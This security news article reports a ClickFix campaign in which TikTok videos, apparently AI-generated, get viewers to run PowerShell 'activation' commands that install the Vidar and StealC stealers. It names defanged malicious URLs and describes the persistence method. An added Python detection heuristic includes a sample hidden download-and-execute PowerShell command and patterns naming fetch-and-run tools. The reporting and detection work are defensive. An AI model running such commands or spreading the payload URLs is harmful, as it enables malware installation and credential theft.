Cybercriminals are using TikTok videos in ClickFix attacks to trick users into infecting themselves with the Vidar and StealC information-stealing malware.
As Trend Micro recently discovered, the threat actors behind this TikTok social engineering campaign are using videos produced using AI that ask viewers to run commands claiming to activate Windows and Microsoft Office, as well as premium features in various legitimate software such as CapCut and Spotify.
“This attack uses videos (possibly AI-generated) to instruct users to execute PowerShell commands, which are disguised as software activation steps. TikTok’s algorithmic reach increases the likelihood of widespread exposure, with one video reaching more than half a million views,” Trend Micro said.
“The videos are highly similar, with only minor differences in camera angles and the download URLs used by PowerShell to fetch the payload.”
“These suggest that the videos were created through automation. The instructional voice also appears to be AI-generated, reinforcing the likelihood that AI tools are being used to produce these videos.”
One of the videos, which claims to provide instructions to “promote your Spotify experience immediately,” has more than 20,000 likes and more than 100 comments.

In the video, the attackers prompt viewers to run a PowerShell command that downloads and executes a remote script from hxxps://allaivo[.]me/spotify. The script installs the Vidar or StealC information-stealing malware, launching it as a hidden process with elevated permissions.
Once deployed, Vidar can take desktop screenshots and steal credentials, credit cards, cookies, cryptocurrency wallets, text files, and Authy 2FA authenticator databases.
StealC can also harvest a wide range of sensitive information from infected computers, as it targets dozens of web browsers and cryptocurrency wallets.
After the device is compromised, the script downloads a second PowerShell script payload from hxxps://amssh[.]co/script[.]ps1, which adds a registry key so that it launches automatically at startup.
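A triage heuristic for the behaviours described above (remote script download and execution, hidden window, elevation, startup registry key), given here as an added example that is not from the article or from Trend Micro. The event fields, rule names, sample telemetry and `example.invalid` URLs are constructed assumptions.

```python
import re

# Heuristics for the behaviours the article describes. Patterns and verdict
# thresholds are illustrative assumptions, not Trend Micro's detection logic.
RULES = {
    "remote_fetch": re.compile(
        r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I),
    "in_memory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden_window": re.compile(r"(?<!\w)-w[a-z]*\s+hidden\b", re.I),
    "elevation": re.compile(r"-verb\s+runas\b", re.I),
    "run_key": re.compile(r"\\currentversion\\run(once)?\b", re.I),
}

def score_event(event):
    """Return (verdict, hits) for one process-creation or registry event."""
    text = event.get("command_line", "") + " " + event.get("registry_target", "")
    hits = sorted(name for name, rx in RULES.items() if rx.search(text))
    fetch_and_run = {"remote_fetch", "in_memory_exec"} <= set(hits)
    # Download-and-execute that also hides or elevates matches the full chain.
    if fetch_and_run and ("hidden_window" in hits or "elevation" in hits):
        return "high", hits
    # Either half on its own is common in admin tooling: send to an analyst.
    if fetch_and_run or "run_key" in hits:
        return "review", hits
    return "ok", hits

def triage(events):
    """Group non-benign verdicts per host so follow-on persistence stands out."""
    findings = {}
    for ev in events:
        verdict, hits = score_event(ev)
        if verdict != "ok":
            findings.setdefault(ev["host"], []).append((verdict, hits))
    return findings

SAMPLE_EVENTS = [  # constructed telemetry, not taken from the campaign
    {"host": "ws-01", "command_line":
     'powershell -WindowStyle Hidden -c "iex (irm https://example.invalid/activate)"'},
    {"host": "ws-01", "command_line": "powershell -File C:\\Scripts\\inventory.ps1"},
    {"host": "ws-02", "command_line":
     "powershell Invoke-WebRequest https://example.invalid/setup.msi -OutFile setup.msi"},
    {"host": "ws-01", "command_line": "powershell -File C:\\Users\\Public\\s.ps1",
     "registry_target": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"},
]

if __name__ == "__main__":
    for host, items in triage(SAMPLE_EVENTS).items():
        print(host, items)
```

A plain file download (the `ws-02` event) stays below the alert threshold, while a hidden download-and-execute followed by a Run key write on the same host surfaces together.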
What is ClickFix?
ClickFix is a tactic in which attackers use fake errors or verification systems, such as CAPTCHA prompts, to trick potential targets into running a malicious script that downloads and installs malware on their devices.
While it generally targets Windows users through PowerShell commands, ClickFix has also been adopted in attacks against macOS and Linux users.
State-sponsored threat groups have hacked their targets in similar attacks, with APT28 and ColdRiver (Russia), Kimsuky (North Korea), and MuddyWater (Iran) all using this tactic in recent months.
This is not the first time TikTok videos have been used to push malware, with cybercriminals having capitalized on a trending TikTok challenge named ‘Invisible Challenge’ to spread the WASP malware.
The malware was pushed through videos that were viewed more than a million times shortly after being posted, and it could steal Discord accounts, passwords, credit cards, and cryptocurrency wallets.
In recent years, scammers have also been flooding TikTok with fake cryptocurrency giveaways, almost all of them Elon Musk, Tesla, or SpaceX themed.